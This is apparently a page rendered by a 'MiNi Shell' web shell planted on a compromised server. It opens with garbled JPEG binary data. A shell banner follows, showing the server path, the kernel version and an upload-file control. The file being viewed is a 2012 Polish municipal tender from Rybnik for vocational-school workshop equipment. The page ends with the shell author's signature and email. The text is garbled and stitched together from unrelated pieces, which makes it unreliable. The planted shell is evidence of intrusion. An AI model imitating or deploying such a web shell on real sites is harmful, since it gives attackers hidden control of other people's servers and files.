JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/386290-N-2012.html

<p class="kh_header"><b>Rybnik: Dostawa sprzętu i wyposażenia pracowni zawodowych 
w ramach projektu Mam zawód - mam pracę w regionie

Zadanie 1.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna.
Zadanie 2.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika.
Zadanie 3.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Technicznych w Rybniku - pracownia mechatroniki.</b><br>
<b>Numer ogłoszenia: 386290 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Rybnik , ul. B. Chrobrego 2, 44-200 Rybnik, woj. śląskie, tel. 032 4223011, faks 032 4224124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybnik.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu i wyposażenia pracowni zawodowych 
w ramach projektu Mam zawód - mam pracę w regionie

Zadanie 1.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna.
Zadanie 2.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika.
Zadanie 3.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Technicznych w Rybniku - pracownia mechatroniki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia pracowni zawodowych w ramach projektu Mam zawód mam pracę w regionie.
Zadanie 1. Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna.
Zadanie 2. Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika.
Zadanie 3. Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Technicznych w Rybniku - pracownia mechatroniki.

Szczegółowy zakres przedmiotu zamówienia opisany został w SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 32.55.00.00-3, 48.00.00.00-8, 48.19.00.00-6, 48.52.00.00-9, 30.21.61.30-6, 22.11.40.00-2, 22.45.80.00-5, 38.11.21.00-4, 45.62.00.00-8, 30.12.30.00-7, 42.65.00.00-7, 42.65.20.00-1, 30.12.30.00-7, 42.65.00.00-7, 42.65.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy (załącznik nr 1 do SIWZ) 
2.	Zestawienie cen (załącznik nr 3 do SIWZ)
3.  Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.rybnik.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 10:00, miejsce: Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, pok. 302.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku, ul. Św. Józefa 30, 44-217 - pracownia logistyczna w:
1.	telefon (1szt.) - wymagania: urządzenie sieciowe z funkcją faksu, telefonu i automatycznej sekretarki,
2.	programy graficzne i statystyczne (wersja edukacyjna; moduły: Bussines Intelligence, CRM, Handel, Logistyka, Finanse i Księgowość, Business Process Menagement - dla 30 stanowisk),
3.	drukarka kodów kreskowych (1szt., ręczna, wraz ze sterownikami pod system WINDOWS 2000, XP, Vista, 7, metalowy mechanizm drukujący, wydruk etykiet metodą termiczną i termotransferową, wbudowany wewnętrzny zasilacz),
4.	czytnik kodów kreskowych (ręczny, wraz z oprogramowaniem, komunikacja po USB - 1 szt.),
5.	biblioteczka zawodowa: wyposażona we wzory dokumentów transportu wewnętrznego 
i magazynowania (bloczki WZ, PZ, faktury, listy przewozowe, 20 szt.), 
6.	słowniki ekonomiczne (słownik terminologii logistycznej - T. Janiak, Wydawnictwo ILIM, 16 szt.);
7.	urządzenie do śledzenia pojazdów (mapfactor) (1 szt.) - zestaw powinien zawierać odbiornik GPS oraz mapę Europy dla samochodów ciężarowych (Mapfactor/SYNGIO/GlobalSat),
8.	słowniki pojęć logistycznych polsko - angielski/angielsko - polski (16 szt.).
Szczegółowy zakres przedmiotu zamówienia opisany został w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 32.55.00.00-3, 48.00.00.00-8, 48.19.00.00-6, 48.52.00.00-9, 30.21.61.30-6, 22.11.40.00-2, 22.45.80.00-5, 38.11.21.00-4, 42.62.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku, ul. Kościuszki 23, 44-200 - pracownia techniczna dla technika mechanika w:
1.	zgrzewarka ręczna punktowa do metalu - wymagane parametry: zasilanie 230 V, grubość zgrzewnej blachy (2-4mm)/ 1 szt.,
2.	twardościomierz (1szt.) - twardościomierz ręczny z odczytem analogowym. Umożliwia pomiar w pełnym zakresie najczęściej stosowanych skali twardości: Vickers, Brinell, Rockwell A, B, C. Urządzenie stosowane jest do pomiarów metodą Vickersa twardych materiałów po hartowaniu za pomocą wgłębnika diamentowego o obciążeniu od HV5 (kg) do HV100 (kg) oraz metodą Brinella (nie ulepszone cieplnie) za pomocą kulki o śr. 2,5 mm - 5 mm i obciążeniach od 62,5 kg do 250 kg,
3.	średnicówka z czujnikiem (1 szt.) - wymagania: zakres pomiarowy do 160 mm,
4.	tokarka do metalu (1szt.) - wymagane parametry: zasilanie 230V, długość toczenia do 600 mm (napięcie - 230V; moc przyłączeniowa - 300W; długość elementu obrabianego - 300 mm; średnica tocz. el. nad łożem - 180 mm; śr. tocz. el. nad suportem - 110 mm; prześwit wrzeciona - 20 mm; stożek wrzeciona (Mk) - III; stożek tulejki (Mk) - II; zakres obrotów - 2st. (obr/min) - 100 - 2500; przekładnia obrotów, płynna regulacja obrotów, gwinty metryczne - 10 st. (mm) - 0,4 - 2; gwinty calowe - 18 st.; maks. posuw sup. nożowego - 55 mm; maks. posuw poprzecznego sup. - 65 mm; maks. posuw podłużnego suportu - 300 mm; automatyczny posuw podłużny; regulowany posuw poprzeczny; rozmiary d/sz/w (mm) - 730/ 330/330; masa - 40 kg; wyposażenie podstawowe: 3-szczękowa głowica uniwersalna O 80 mm; kieł stały, zestaw kół zębatych; wyposażenie specjalne: 4-ro szczękowa głowica uniwersalna; O 80 mm; tarcza czołowa; luneta stała; luneta przesuwna; zestaw gwintowników calowych; wskaźnik liczby gwintów; kieł obrotowy Mk II; głowica zaciskowa; tuleje zaciskowe O 3, 4, 6, 8, 10, 12 mm; głowica wiertnicza 13/16B; przyrząd frezerski; trzpień B16/Mk; komplet noży SK 8 x 8 (11 szt.); kołnierz sprzęgający pod uchwyt trójszczękowy /1 szt.,
5.	pirometr (1 szt.) - wymagania: laserowy, bezdotykowy;
6.	tachometr (1 szt.) - wymagania: zakres pomiarowy metodą mechaniczną lub optyczną w zakresie 1-20000 obr/min, laserowy, bezdotykowy,
7.	młotek Poldi z płytkami wzorcowymi (1 szt.) - wymagania: młotek, wzorce twardości, lupa pomiarowa;
8.	frezarka (1 szt.) - dolnowrzecionowa lub górnowrzecionowa, uniwersalna lub tokarko-frezarka mini, minimalne parametry: zasilanie 230V; wymiary stołu 710x640 mm; wymiary stołu przesuwnego: 500x480 mm; wysokość robocza 910 mm; średnica trzpienia 30 mm; odchylany trzpień -5o do +30o; ustawianie wysokości trzpienia 100 mm; długość mocująca 105 mm; maks. średnica narzędzia 200 mm; maks. średnica opuszczanego narzędzia 180 mm; otwieranie stołu frezarskiego 200 mm; obroty piły głównej 1800/3000/6000/9000 obr./min; moc silnika 2,82 kW,
9.	szlifierka walcowa (1 szt.) - wymagane parametry: maks. szlifowanie płaszczyzna do szerokości 800 mm, min. długość 60 mm; min./maks. grubość obrabianego przedmiotu 0,8/75 mm; ściernica walcowa 132x410 mm; posuw bezstopniowo 0-3,0 m/min; zakres obrotów 1440 obr./min; króciec ssący 100 mm; silnik 0,75 kW (1,0 PS)/400 V; waga 80 kg,
10.	przyrząd do pomiaru chropowatości powierzchni (1 szt.)- wymagane parametry: odcinki pomiarowe: 1,5/4,8/15 mm oraz 0,64/3,2/16 mm; maksymalna długość odcinka pomiarowego: 17,5 mm; odcinki elementarne: 0,25/0,8/2,5 mm; zakres: 320 mikrometrów (-210/+110); rozdzielczość 10 nm.; klasa dokładności: 1 klasa zgodnie z DIN 4772; pięć programów pomiarowych; kolorowy wyświetlacz oraz wyjście USB i Bluetooth; możliwość komunikacji z drukarką oraz z programem Turbo Datawin.; wyposażony w wbudowaną pamięć; zasilany z baterii lub gniazda sieciowego;
11.	aparat Erichsena (1 szt.) lub inne urządzenie do pomiaru tłoczności lub ogólnych pomiarów mechanicznych,
12.	giętarko-zaginarka (1 szt.) - wymagane parametry: długość robocza do 2000 mm, szerokość ramienia zaginającego do 20 mm, kąt zaginania do 145, grubość blachy do 1 mm, wałki-O 28 mm; walce górne -O 98 mm; walce dolne -O 115 mm,
13.	mikroskop metalograficzny ze zgładami (1 szt.) - wymagane parametry: zakres powiększeń od 50 do 1000, oświetlacz halogenowy o mocy 6V/30W; zasilacz wbudowany w podstawę mikroskopu; płynna regulacja natężenia oświetlenia; regulacja położenia włókna żarówki; nasadka binokularowa z regulacją dioptryjną w obu okularach oraz regulacją rozstawu okularów; zmieniacz obiektywów posiadający 4 gniazda; okular PLAN kompensacyjne: okular 10x/18 (2 szt.); okular 12,5x/14 (2 szt.); okular pomiarowy oraz mikrometr 0.01 mm; obiektywy PLAN achromatyczne CF wolne od aberacji: PLAN achromat 10x/0.25, PLAN achromat 20x/0.35, PLAN achromat 40x/0.65, PLAN achromat 100x/1.2,
14.	zestaw do sterowania pneumatyką (NV 3020) /1 szt.
Szczegółowy zakres przedmiotu zamówienia opisany został w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.30.00-7, 42.65.00.00-7, 42.65.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Technicznych w Rybniku - pracownia mechatroniki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Technicznych w Rybniku, ul. Kościuszki 5, 44-200 - pracownia mechatroniki w:
1.	zestaw czujników systemów elektronicznych pojazdów - wymagania: napięcie zasilania 12V, zestaw powinien zawierać przepływomierze powietrza (masowy i objętościowy), MAP-sensory, główne czujniki systemów pojazdowych (czujnik spalania stukowego, czujnik temperatury silnika, czujnik temperatury powietrza, sonda Lambda, czujnik aktywny prędkości obrotowej, czujnik prędkości pojazdu, czujnik przyśpieszeń, czujnik kierunku obrotów, czujnik ciśnienia różnicowego, czujnik ciśnienia oleju, czujnik poziomu paliwa)/ 1 zestaw,
2.	układ pneumatyki przemysłowej - zestaw powinien zawierać: 6 x siłownik jednostronnego działania fi32, skok 50, 10bar; 6 x siłownik dwustronnego działania fi32, skok 100, 10bar; 6 x elektrozawór 3/2 bistabilny, cewka 24 VDC; 6 x elektrozawór 5/2 bistabilny, cewka 24 VDC; 6 x zawór 3/2 z dźwignią lub przyciskiem; 6 x zawór 3/2 sterowany pneumatycznie dwustronnie; 6 x zawór 5/2 sterowany pneumatycznie dwustronnie; 6 x zawór 3/2 z rolką; 6 x zawór dławiący; 3 x układ przygotowania powietrza wydajność 500 l/min, filtracja 25 mikrometrów, zakres regulacji 0,5 - 8,5 bar; 20 m przewód pneumatyczny fi 4mm; 50 x szybkozłączki typu kolanko na przewód fi 4mm; 20 x rozgałęźnik typu trójnik na przewód fi 4mm; 10 x zaślepki fi 4mm; wszystkie elementy wyposażone w szybkozłączki umożliwiające połączenie przewodem fi 4mm; wszystkie elementy z uchwytami umożliwiającymi mocowanie do powierzchni płaskich),
3.	plansza szkoleniowa (10 szt.): plansze powinny obejmować następującą tematykę: system sterowania silnika ZI typu D-Jetronic; system sterowania silnika ZI typu KE-Jetronic; system sterowania silnika ZI typu LE-Jetronic; system sterowania silnika ZI typu Motronic; system sterowania silnikiem ZS typu EDC; system sterowania silnikiem ZS typu UIS; system sterowania silnikiem ZS typu Common Rail; system sterowania silnika ZI typu Mono-Motronic; uystem regulacji siły hamowania i momentów napędowych kół ABS/ASR; elektroniczne układy zapłonowe silników ZI,
4.	sprężarka (1 szt. dla 4 stanowisk) - wymagania: ciśnienie maks.: 10 bar, pojemność zbiornika: min 50 l, wydajność: 200 l/min, silnik elektryczny zasilany 230 V,
5.	elementy układu sterowania (4 zestawy) -1 zestaw powinien zawierać: 2 x czujnik indukcyjny, zasilanie 24V, strefa 0 - 20mm; przekaźnik elektromagnetyczny montowany na szynę TH35, napięcie cewki 24VDC, obciążalność styków 5A; przycisk monostabilny NO montowany na szynę TH35; przycisk monostabilny NC montowany na szynę TH35; lampka sygnalizacyjna montowana na szynę TH35, 24VDC),
6.	sterowniki PLC (2 zestawy) - 1 zestaw powinien zawierać 6 szt. modułów uruchomieniowych: 6 x S7-1200 CPU 1214C DC/DC/DC (sterownik PLC, 14 wejść binarnych (24V DC) / 10 wyjść binarnych (24V DC) / 2 wejścia analogowe (0 - 10V DC), zasilanie: 24V DC, możliwość rozbudowy),; 6 x STEP7 BASIC - licencja jednostanowiskowa oprogramowania,; 6 x SB1232 (moduł analogowy),; 6 x SIM1274 (simulator wejść 8 kanałów); 6 x RJ45 (przewód Ethernet). 
Szczegółowy zakres zamówienia opisany został w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.30.00-7, 42.65.00.00-7, 42.65.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com